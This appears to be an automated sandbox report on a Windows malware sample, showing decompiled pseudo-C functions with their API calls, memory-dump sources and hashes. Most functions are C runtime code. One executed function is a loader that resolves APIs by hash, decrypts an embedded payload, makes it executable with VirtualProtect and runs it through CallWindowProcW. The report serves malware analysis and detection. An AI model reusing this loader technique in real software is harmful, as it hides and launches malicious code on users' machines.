                                        • Instruction Fuzzy Hash: A7019231542706DAEBB9BB68D844798B7EC6F30721F24858EE5E86E1D0DF748580C664
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E010659FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                        				void* _t7;
                                        				long _t8;
                                        				intOrPtr* _t9;
                                        				intOrPtr* _t12;
                                        				long _t20;
                                        				long _t31;
                                        
                                        				if(_a4 != 0) {
                                        					_t31 = _a8;
                                        					__eflags = _t31;
                                        					if(_t31 != 0) {
                                        						_push(__ebx);
                                        						while(1) {
                                        							__eflags = _t31 - 0xffffffe0;
                                        							if(_t31 > 0xffffffe0) {
                                        								break;
                                        							}
                                        							__eflags = _t31;
                                        							if(_t31 == 0) {
                                        								_t31 = _t31 + 1;
                                        								__eflags = _t31;
                                        							}
                                        							_t7 = HeapReAlloc( *0x10bfd1c, 0, _a4, _t31);
                                        							_t20 = _t7;
                                        							__eflags = _t20;
                                        							if(_t20 != 0) {
                                        								L17:
                                        								_t8 = _t20;
                                        							} else {
                                        								__eflags =  *0x10c0a40 - _t7;
                                        								if(__eflags == 0) {
                                        									_t9 = E01064196(__eflags);
                                        									 *_t9 = E010641EF(GetLastError());
                                        									goto L17;
                                        								} else {
                                        									__eflags = E0106455B(_t7, _t31);
                                        									if(__eflags == 0) {
                                        										_t12 = E01064196(__eflags);
                                        										 *_t12 = E010641EF(GetLastError());
                                        										L12:
                                        										_t8 = 0;
                                        										__eflags = 0;
                                        									} else {
                                        										continue;
                                        									}
                                        								}
                                        							}
                                        							goto L14;
                                        						}
                                        						E0106455B(_t6, _t31);
                                        						 *((intOrPtr*)(E01064196(__eflags))) = 0xc;
                                        						goto L12;
                                        					} else {
                                        						E010632B6(_a4);
                                        						_t8 = 0;
                                        					}
                                        					L14:
                                        					return _t8;
                                        				} else {
                                        					return E0106596C(__ebx, __edx, __edi, _a8);
                                        				}
                                        			}










                                        APIs
                                        • _malloc.LIBCMT ref: 01065A0A
                                          • Part of subcall function 0106596C: __FF_MSGBANNER.LIBCMT ref: 01065983
                                          • Part of subcall function 0106596C: __NMSG_WRITE.LIBCMT ref: 0106598A
                                          • Part of subcall function 0106596C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,0106334C,00000000,00000000,00000000,00000000,?,01063201,00000018,0107CDB0), ref: 010659AF
                                        • _free.LIBCMT ref: 01065A1D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: AllocHeap_free_malloc
                                        • String ID:
                                        • API String ID: 2734353464-0
                                        • Opcode ID: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction ID: f78d5f34113f0e61f70c23818527253ab988fdacd78ea6edbdeb71e0048968f4
                                        • Opcode Fuzzy Hash: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction Fuzzy Hash: BE118636504716EFDB717F78AC846AD3BDC9F242A0F104566F9D9DA141EB3589408790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0106F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				int _v20;
                                        				int _t35;
                                        				int _t38;
                                        				intOrPtr* _t44;
                                        				int _t47;
                                        				short* _t49;
                                        				intOrPtr _t50;
                                        				intOrPtr _t54;
                                        				int _t55;
                                        				int _t59;
                                        				char* _t62;
                                        
                                        				_t62 = _a8;
                                        				if(_t62 == 0) {
                                        					L5:
                                        					return 0;
                                        				}
                                        				_t50 = _a12;
                                        				if(_t50 == 0) {
                                        					goto L5;
                                        				}
                                        				if( *_t62 != 0) {
                                        					E010637C4( &_v20, _a16);
                                        					_t35 = _v20;
                                        					__eflags =  *(_t35 + 0xa8);
                                        					if( *(_t35 + 0xa8) != 0) {
                                        						_t38 = E0106F121( *_t62 & 0x000000ff,  &_v20);
                                        						__eflags = _t38;
                                        						if(_t38 == 0) {
                                        							__eflags = _a4;
                                        							_t59 = 1;
                                        							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                        							if(__eflags != 0) {
                                        								L21:
                                        								__eflags = _v8;
                                        								if(_v8 != 0) {
                                        									_t54 = _v12;
                                        									_t31 = _t54 + 0x70;
                                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                        									__eflags =  *_t31;
                                        								}
                                        								return _t59;
                                        							}
                                        							L20:
                                        							_t44 = E01064196(__eflags);
                                        							_t59 = _t59 | 0xffffffff;
                                        							__eflags = _t59;
                                        							 *_t44 = 0x2a;
                                        							goto L21;
                                        						}
                                        						_t59 = _v20;
                                        						__eflags =  *(_t59 + 0x74) - 1;
                                        						if( *(_t59 + 0x74) <= 1) {
                                        							L15:
                                        							__eflags = _t50 -  *(_t59 + 0x74);
                                        							L16:
                                        							if(__eflags < 0) {
                                        								goto L20;
                                        							}
                                        							__eflags = _t62[1];
                                        							if(__eflags == 0) {
                                        								goto L20;
                                        							}
                                        							L18:
                                        							_t59 =  *(_t59 + 0x74);
                                        							goto L21;
                                        						}
                                        						__eflags = _t50 -  *(_t59 + 0x74);
                                        						if(__eflags < 0) {
                                        							goto L16;
                                        						}
                                        						__eflags = _a4;
                                        						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                        						_t59 = _v20;
                                        						__eflags = _t47;
                                        						if(_t47 != 0) {
                                        							goto L18;
                                        						}
                                        						goto L15;
                                        					}
                                        					_t55 = _a4;
                                        					__eflags = _t55;
                                        					if(_t55 != 0) {
                                        						 *_t55 =  *_t62 & 0x000000ff;
                                        					}
                                        					_t59 = 1;
                                        					goto L21;
                                        				}
                                        				_t49 = _a4;
                                        				if(_t49 != 0) {
                                        					 *_t49 = 0;
                                        				}
                                        				goto L5;
                                        			}

















                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0106F42C
                                        • __isleadbyte_l.LIBCMT ref: 0106F45A
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F488
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F4BE
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction ID: 9cae400fde65ca157654dee80779df27549578146d198d94eca8352c2391c763
                                        • Opcode Fuzzy Hash: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction Fuzzy Hash: 3531C330600247AFDB22CE28E854BBA7FF9FF41220F154169E8A497590DB30D850CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E01072F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                        				intOrPtr _t25;
                                        				void* _t26;
                                        
                                        				_t25 = _a16;
                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                        					_t26 = E010734F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        					goto L9;
                                        				} else {
                                        					_t35 = _t25 - 0x66;
                                        					if(_t25 != 0x66) {
                                        						__eflags = _t25 - 0x61;
                                        						if(_t25 == 0x61) {
                                        							L7:
                                        							_t26 = E01073025(_a4, _a8, _a12, _a20, _a24, _a28);
                                        						} else {
                                        							__eflags = _t25 - 0x41;
                                        							if(__eflags == 0) {
                                        								goto L7;
                                        							} else {
                                        								_t26 = E010737A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        							}
                                        						}
                                        						L9:
                                        						return _t26;
                                        					} else {
                                        						return E010736C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                        					}
                                        				}
                                        			}






                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction ID: a8f7806c986f01df1c3fc52e3d4c6ab4070d4a5267a5bcfa79cf02249f7dcfa9
                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction Fuzzy Hash: 9E01497280014EBBDF275E88CC15CEE3F66BF18354B498565FE9858131D237CAB1AB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E010687A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr* _t24;
                                        				void* _t28;
                                        				intOrPtr* _t40;
                                        				void* _t41;
                                        
                                        				_push(0xc);
                                        				_push(0x107cf38);
                                        				E010627F0(__ebx, __edi, __esi);
                                        				_t28 = E010615FE();
                                        				_t40 = E010632EE(8, 1);
                                        				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
                                        				_t43 = _t40;
                                        				if(_t40 != 0) {
                                        					E010636DB(_t28, __edx, 1, _t40, __eflags);
                                        					E01063AF6(_t28, __edx, 1, _t40, __eflags);
                                        					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
                                        					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
                                        					E01063117(0xc);
                                        					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                        					E0106344C( *_t40);
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E01068E70();
                                        					E01063117(0xd);
                                        					 *(_t41 - 4) = 1;
                                        					asm("lock xadd [eax], edi");
                                        					__eflags = 2;
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E01068E7C();
                                        					_t24 = _t40;
                                        				} else {
                                        					 *((intOrPtr*)(E01064196(_t43))) = 0xc;
                                        					_t24 = 0;
                                        				}
                                        				return E01062835(_t24);
                                        			}








                                        APIs
                                          • Part of subcall function 010615FE: __getptd_noexit.LIBCMT ref: 010615FF
                                          • Part of subcall function 010615FE: __amsg_exit.LIBCMT ref: 0106160C
                                        • __calloc_crt.LIBCMT ref: 01068DEF
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • __lock.LIBCMT ref: 01068E25
                                        • ___addlocaleref.LIBCMT ref: 01068E31
                                        • __lock.LIBCMT ref: 01068E45
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                        • String ID:
                                        • API String ID: 2580527540-0
                                        • Opcode ID: a8f8b39b4fd8b99086203ddb97aabe85cbe9bf1f90d227263d62553b714ea46d
                                        • Instruction ID: ed79b797b199567b6beb09da8a3a6740a72e3d513c320f02d58842ccb50fc915
                                        • Opcode Fuzzy Hash: a8f8b39b4fd8b99086203ddb97aabe85cbe9bf1f90d227263d62553b714ea46d
                                        • Instruction Fuzzy Hash: 32015231A05302EFD720BFB98901B9DB7E8AF65720F10814AE4D99F2D0DB745D41CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        C-Code - Quality: 38%
                                        			E01077800(void* __ebx, void* __esi, void* __eflags) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				long _v16;
                                        				char _v18;
                                        				short _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				char _v30;
                                        				short _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				void* __edi;
                                        				intOrPtr* _t40;
                                        				intOrPtr* _t43;
                                        				void* _t44;
                                        				intOrPtr* _t48;
                                        				void* _t49;
                                        				signed char _t50;
                                        				intOrPtr* _t56;
                                        				void* _t85;
                                        				void* _t87;
                                        
                                        				_v28 = 0x72657355;
                                        				_v24 = 0x642e3233;
                                        				_v20 = 0x6c6c;
                                        				_v18 = 0;
                                        				_v40 = 0x72637052;
                                        				_v36 = 0x642e3474;
                                        				_v32 = 0x6c6c;
                                        				_v30 = 0;
                                        				_t56 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
                                        				_t12 =  &_v28; // 0x72657355
                                        				_v8 = E01077950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
                                        				_t40 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
                                        				_t17 =  &_v28; // 0x72657355
                                        				_t43 = E01077950( *_t56(_t17), 0xc7e6f44f);
                                        				_t44 =  *_t40(0); // executed
                                        				 *_t43(_t44);
                                        				_t18 =  &_v40; // 0x72637052
                                        				_t48 = E01077950( *_t56(_t18), 0x958d1c17);
                                        				_t49 =  *_t48(2, 0, 1, 0,  &_v12); // executed
                                        				_t87 = 0;
                                        				if(_t49 != 0 && _t49 == 0x57) {
                                        					_t50 = 0;
                                        					do {
                                        						_t20 = 0x107f0d0 + _t50; // 0x17e1e9
                                        						asm("rol dl, 0x2");
                                        						asm("ror dl, 0x3");
                                        						 *(0x107f0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
                                        						_t50 = _t50 + 1;
                                        					} while (_t50 < 0x1e05);
                                        					VirtualProtect(0x107f0d0, 0x1e05, 0x40,  &_v16); // executed
                                        					CallWindowProcW(0x107f0d0, 0x1080ed8, 0, 0, 0);
                                        					return E01077D10(_t87);
                                        				}
                                        				return _t49;
                                        			}

























                                        APIs
                                        • GetConsoleWindow.KERNELBASE(00000000), ref: 010778A6
                                        • RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 010778CB
                                        • VirtualProtect.KERNELBASE(0107F0D0,00001E05,00000040,?), ref: 0107792C
                                        • CallWindowProcW.USER32(0107F0D0,01080ED8,00000000,00000000,00000000), ref: 01077942
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: Window$BeginCallConsoleMgmtProcProtectVirtual
                                        • String ID: Rpcrt4.dllUser32.dll$User32.dll
                                        • API String ID: 546183053-2494872352
                                        • Opcode ID: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction ID: 154657245df555d4070759374ac87797fa3ff0e4785defbcb9ca7b1ac9af44e5
                                        • Opcode Fuzzy Hash: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction Fuzzy Hash: DF31FF71B402099FDB01DBB9C88ABDFB7E5EF49710F100094E644EB3A2DA75D9048798
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E01061DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int _t82;
                                        				signed int _t86;
                                        				long _t90;
                                        				void* _t91;
                                        				signed int _t94;
                                        				signed int _t98;
                                        				signed int _t99;
                                        				signed char _t103;
                                        				signed int _t105;
                                        				intOrPtr _t106;
                                        				intOrPtr* _t109;
                                        				signed char _t111;
                                        				long _t119;
                                        				intOrPtr _t129;
                                        				signed int _t133;
                                        				void* _t135;
                                        				signed int _t138;
                                        				void** _t139;
                                        				signed int _t141;
                                        				signed int _t142;
                                        				signed int _t143;
                                        				signed int _t147;
                                        				signed int _t149;
                                        				void* _t150;
                                        				signed int _t154;
                                        				void* _t155;
                                        				void* _t156;
                                        
                                        				_push(0x64);
                                        				_push(0x107cd50);
                                        				E010627F0(__ebx, __edi, __esi);
                                        				E01063117(0xb);
                                        				 *((intOrPtr*)(_t155 - 4)) = 0;
                                        				_push(0x40);
                                        				_t141 = 0x20;
                                        				_push(_t141);
                                        				_t82 = E010632EE();
                                        				_t133 = _t82;
                                        				 *(_t155 - 0x24) = _t133;
                                        				if(_t133 != 0) {
                                        					 *0x10bfd20 = _t82;
                                        					 *0x10c1b28 = _t141;
                                        					while(1) {
                                        						__eflags = _t133 - 0x800 + _t82;
                                        						if(_t133 >= 0x800 + _t82) {
                                        							break;
                                        						}
                                        						 *((short*)(_t133 + 4)) = 0xa00;
                                        						 *_t133 =  *_t133 | 0xffffffff;
                                        						 *((intOrPtr*)(_t133 + 8)) = 0;
                                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
                                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
                                        						 *((short*)(_t133 + 0x25)) = 0xa0a;
                                        						 *((intOrPtr*)(_t133 + 0x38)) = 0;
                                        						 *((char*)(_t133 + 0x34)) = 0;
                                        						_t133 = _t133 + 0x40;
                                        						 *(_t155 - 0x24) = _t133;
                                        						_t82 =  *0x10bfd20; // 0x14b47c0
                                        					}
                                        					GetStartupInfoW(_t155 - 0x74);
                                        					__eflags =  *((short*)(_t155 - 0x42));
                                        					if( *((short*)(_t155 - 0x42)) == 0) {
                                        						L27:
                                        						_t129 = 0xfffffffe;
                                        						L28:
                                        						_t142 = 0;
                                        						__eflags = 0;
                                        						while(1) {
                                        							 *(_t155 - 0x2c) = _t142;
                                        							__eflags = _t142 - 3;
                                        							if(_t142 >= 3) {
                                        								break;
                                        							}
                                        							_t147 = (_t142 << 6) +  *0x10bfd20;
                                        							 *(_t155 - 0x24) = _t147;
                                        							__eflags =  *_t147 - 0xffffffff;
                                        							if( *_t147 == 0xffffffff) {
                                        								L33:
                                        								 *(_t147 + 4) = 0x81;
                                        								__eflags = _t142;
                                        								if(_t142 != 0) {
                                        									_t65 = _t142 - 1; // -1
                                        									asm("sbb eax, eax");
                                        									_t90 =  ~_t65 + 0xfffffff5;
                                        									__eflags = _t90;
                                        								} else {
                                        									_t90 = 0xfffffff6;
                                        								}
                                        								_t91 = GetStdHandle(_t90);
                                        								 *(_t155 - 0x1c) = _t91;
                                        								__eflags = _t91 - 0xffffffff;
                                        								if(_t91 == 0xffffffff) {
                                        									L45:
                                        									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
                                        									 *_t147 = _t129;
                                        									_t94 =  *0x10c1a80; // 0x14b55f8
                                        									__eflags = _t94;
                                        									if(_t94 != 0) {
                                        										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
                                        									}
                                        									goto L47;
                                        								} else {
                                        									__eflags = _t91;
                                        									if(_t91 == 0) {
                                        										goto L45;
                                        									}
                                        									_t98 = GetFileType(_t91); // executed
                                        									__eflags = _t98;
                                        									if(_t98 == 0) {
                                        										goto L45;
                                        									}
                                        									 *_t147 =  *(_t155 - 0x1c);
                                        									_t99 = _t98 & 0x000000ff;
                                        									__eflags = _t99 - 2;
                                        									if(_t99 != 2) {
                                        										__eflags = _t99 - 3;
                                        										if(_t99 != 3) {
                                        											L44:
                                        											_t71 = _t147 + 0xc; // -17562900
                                        											E01062D36(_t71, 0xfa0, 0);
                                        											_t156 = _t156 + 0xc;
                                        											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
                                        											L47:
                                        											_t142 = _t142 + 1;
                                        											continue;
                                        										}
                                        										_t103 =  *(_t147 + 4) | 0x00000008;
                                        										__eflags = _t103;
                                        										L43:
                                        										 *(_t147 + 4) = _t103;
                                        										goto L44;
                                        									}
                                        									_t103 =  *(_t147 + 4) | 0x00000040;
                                        									goto L43;
                                        								}
                                        							}
                                        							__eflags =  *_t147 - _t129;
                                        							if( *_t147 == _t129) {
                                        								goto L33;
                                        							}
                                        							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
                                        							goto L47;
                                        						}
                                        						 *((intOrPtr*)(_t155 - 4)) = _t129;
                                        						E0106207A();
                                        						_t86 = 0;
                                        						__eflags = 0;
                                        						L49:
                                        						return E01062835(_t86);
                                        					}
                                        					_t105 =  *(_t155 - 0x40);
                                        					__eflags = _t105;
                                        					if(_t105 == 0) {
                                        						goto L27;
                                        					}
                                        					_t135 =  *_t105;
                                        					 *(_t155 - 0x1c) = _t135;
                                        					_t106 = _t105 + 4;
                                        					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                        					 *(_t155 - 0x20) = _t106 + _t135;
                                        					__eflags = _t135 - 0x800;
                                        					if(_t135 >= 0x800) {
                                        						_t135 = 0x800;
                                        						 *(_t155 - 0x1c) = 0x800;
                                        					}
                                        					_t149 = 1;
                                        					__eflags = 1;
                                        					 *(_t155 - 0x30) = 1;
                                        					while(1) {
                                        						__eflags =  *0x10c1b28 - _t135; // 0x20
                                        						if(__eflags >= 0) {
                                        							break;
                                        						}
                                        						_t138 = E010632EE(_t141, 0x40);
                                        						 *(_t155 - 0x24) = _t138;
                                        						__eflags = _t138;
                                        						if(_t138 != 0) {
                                        							0x10bfd20[_t149] = _t138;
                                        							 *0x10c1b28 =  *0x10c1b28 + _t141;
                                        							__eflags =  *0x10c1b28;
                                        							while(1) {
                                        								__eflags = _t138 - 0x800 + 0x10bfd20[_t149];
                                        								if(_t138 >= 0x800 + 0x10bfd20[_t149]) {
                                        									break;
                                        								}
                                        								 *((short*)(_t138 + 4)) = 0xa00;
                                        								 *_t138 =  *_t138 | 0xffffffff;
                                        								 *((intOrPtr*)(_t138 + 8)) = 0;
                                        								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                        								 *((short*)(_t138 + 0x25)) = 0xa0a;
                                        								 *((intOrPtr*)(_t138 + 0x38)) = 0;
                                        								 *((char*)(_t138 + 0x34)) = 0;
                                        								_t138 = _t138 + 0x40;
                                        								 *(_t155 - 0x24) = _t138;
                                        							}
                                        							_t149 = _t149 + 1;
                                        							 *(_t155 - 0x30) = _t149;
                                        							_t135 =  *(_t155 - 0x1c);
                                        							continue;
                                        						}
                                        						_t135 =  *0x10c1b28; // 0x20
                                        						 *(_t155 - 0x1c) = _t135;
                                        						break;
                                        					}
                                        					_t143 = 0;
                                        					 *(_t155 - 0x2c) = 0;
                                        					_t129 = 0xfffffffe;
                                        					_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                        					_t139 =  *(_t155 - 0x20);
                                        					while(1) {
                                        						__eflags = _t143 - _t135;
                                        						if(_t143 >= _t135) {
                                        							goto L28;
                                        						}
                                        						_t150 =  *_t139;
                                        						__eflags = _t150 - 0xffffffff;
                                        						if(_t150 == 0xffffffff) {
                                        							L22:
                                        							_t143 = _t143 + 1;
                                        							 *(_t155 - 0x2c) = _t143;
                                        							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                        							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                        							_t139 =  &(_t139[1]);
                                        							 *(_t155 - 0x20) = _t139;
                                        							continue;
                                        						}
                                        						__eflags = _t150 - _t129;
                                        						if(_t150 == _t129) {
                                        							goto L22;
                                        						}
                                        						_t111 =  *_t109;
                                        						__eflags = _t111 & 0x00000001;
                                        						if((_t111 & 0x00000001) == 0) {
                                        							goto L22;
                                        						}
                                        						__eflags = _t111 & 0x00000008;
                                        						if((_t111 & 0x00000008) != 0) {
                                        							L20:
                                        							_t154 = ((_t143 & 0x0000001f) << 6) + 0x10bfd20[_t143 >> 5];
                                        							 *(_t155 - 0x24) = _t154;
                                        							 *_t154 =  *_t139;
                                        							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                        							_t37 = _t154 + 0xc; // 0xd
                                        							E01062D36(_t37, 0xfa0, 0);
                                        							_t156 = _t156 + 0xc;
                                        							_t38 = _t154 + 8;
                                        							 *_t38 =  *(_t154 + 8) + 1;
                                        							__eflags =  *_t38;
                                        							_t139 =  *(_t155 - 0x20);
                                        							L21:
                                        							_t135 =  *(_t155 - 0x1c);
                                        							goto L22;
                                        						}
                                        						_t119 = GetFileType(_t150);
                                        						_t139 =  *(_t155 - 0x20);
                                        						__eflags = _t119;
                                        						if(_t119 == 0) {
                                        							goto L21;
                                        						}
                                        						goto L20;
                                        					}
                                        					goto L28;
                                        				}
                                        				_t86 = E01064E90(_t155, 0x107ece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                        				goto L49;
                                        			}































                                        APIs
                                        • __lock.LIBCMT ref: 01061DDD
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • __calloc_crt.LIBCMT ref: 01061DEE
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 01061E09
                                        • GetStartupInfoW.KERNEL32(?,0107CD50,00000064,01061146,0107CCC0,00000014), ref: 01061E62
                                        • __calloc_crt.LIBCMT ref: 01061EAD
                                        • GetFileType.KERNEL32(00000001), ref: 01061EF6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2621518576-0
                                        • Opcode ID: 36c2fdaf9870043b049a5cb3fd7ac8ee2265f785c8b575b642751e71ff3f11b7
                                        • Instruction ID: 4220f4b57403b46eff6df1509059b8c0391ed9c9b4e7ec4f1c3e11ebc24afd61
                                        • Opcode Fuzzy Hash: 36c2fdaf9870043b049a5cb3fd7ac8ee2265f785c8b575b642751e71ff3f11b7
                                        • Instruction Fuzzy Hash: 1F81B371D04246CFDB24CF68C8405ADBBF9BF59320B2442AEE4E6AB391D7399802CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0107F73D
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3), ref: 0107F767
